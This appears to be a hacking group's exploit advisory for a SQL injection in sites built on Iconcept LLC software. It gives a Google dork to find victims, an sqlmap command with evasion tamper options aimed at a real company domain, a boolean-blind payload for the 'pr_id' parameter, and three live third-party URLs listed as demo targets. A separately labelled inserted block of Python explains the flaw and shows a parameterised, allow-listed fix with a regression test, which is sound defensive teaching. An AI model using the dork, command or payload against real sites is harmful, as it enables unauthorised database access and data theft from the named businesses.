#################################################################################
# Exploit Title: Dubai Iconcept LLC SQL Injection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by Iconcept LLC" inurl:pr_id=
# Tested on : Kali Linux 2017.3
# Date : 22.12.2017
# Vendor Home: http://iconceptme.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking In Google Or Other Search Engine
[+] Sqlmap Or Manual
[+] Manager: localhost.com/admin/
[+] SQL GET Parameter "pr_id" Is Vulnerable.
Command: root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.maqammed.ae/product.php?pr_id=258" --tamper=space2comment,randomcase --dbs
Parameter: pr_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pr_id=258 AND 7960=7960
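Added example (not part of the original advisory and not the vendor's code): why the reported payload works against a concatenated query, and how an integer allow-list plus a bound parameter removes the boolean oracle. The table layout, function names and the false-condition twin are assumptions constructed for illustration, using an in-memory SQLite database.

```python
import sqlite3

TRUE_TWIN = "258 AND 7960=7960"   # payload reported by sqlmap on this page
FALSE_TWIN = "258 AND 7960=7961"  # constructed: same shape, false condition

def make_db():
    """Constructed in-memory catalogue; table and column names are assumed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (pr_id INTEGER PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO products VALUES (258, 'sample product')")
    return db

def lookup_vulnerable(db, pr_id):
    # The raw request value is concatenated into the statement, so anything
    # after the number is parsed as SQL.
    return db.execute(
        "SELECT name FROM products WHERE pr_id = " + pr_id).fetchall()

def lookup_hardened(db, pr_id):
    # 1) Allow-list: pr_id must be a short, plain ASCII decimal integer.
    if not (pr_id.isascii() and pr_id.isdigit() and len(pr_id) <= 10):
        raise ValueError("pr_id must be an integer")
    # 2) Bound parameter: the value never becomes part of the SQL text.
    return db.execute(
        "SELECT name FROM products WHERE pr_id = ?", (int(pr_id),)).fetchall()

def leaks_boolean_oracle(lookup, db):
    """Regression check: does the response depend on the injected condition?"""
    def run(value):
        try:
            return lookup(db, value)
        except ValueError:
            return "rejected"
    return run(TRUE_TWIN) != run(FALSE_TWIN)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks:", leaks_boolean_oracle(lookup_vulnerable, db))
    print("hardened leaks:  ", leaks_boolean_oracle(lookup_hardened, db))
```

The same oracle check can run in a test suite against any handler that takes pr_id, so a regression to string concatenation fails the build.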
Demo SQL:
http://www.dynaspex.com/safinat/product.php?pr_id=1480#popup1
http://www.cvision.ae/product.php?pr_id=39
http://www.maqammed.ae/product.php?pr_id=258
Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen